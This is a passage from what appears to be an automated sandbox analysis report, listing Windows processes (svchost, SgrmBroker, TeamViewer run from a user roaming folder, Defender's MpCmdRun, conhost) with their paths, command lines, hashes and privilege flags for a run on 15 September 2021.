                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: svchost.exe PID: 1972 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:23
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: SgrmBroker.exe PID: 2144 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:24
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                    Imagebase:0x7ff64e740000
                                                                                                                                    File size:163336 bytes
                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: svchost.exe PID: 1412 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:25
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: svchost.exe PID: 6408 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:32
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 6452 Parent PID: 3472

                                                                                                                                    General

                                                                                                                                    Start time:13:51:36
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 6572 Parent PID: 3472

                                                                                                                                    General

                                                                                                                                    Start time:13:51:44
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 6592 Parent PID: 4832

                                                                                                                                    General

                                                                                                                                    Start time:13:51:44
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 6656 Parent PID: 4832

                                                                                                                                    General

                                                                                                                                    Start time:13:51:51
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: svchost.exe PID: 6676 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:51
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: MpCmdRun.exe PID: 6148 Parent PID: 1412

                                                                                                                                    General

                                                                                                                                    Start time:13:52:26
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                    Imagebase:0x7ff6b8640000
                                                                                                                                    File size:455656 bytes
                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Analysis Process: conhost.exe PID: 4012 Parent PID: 6148

                                                                                                                                    General

                                                                                                                                    Start time:13:52:28
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Reset < >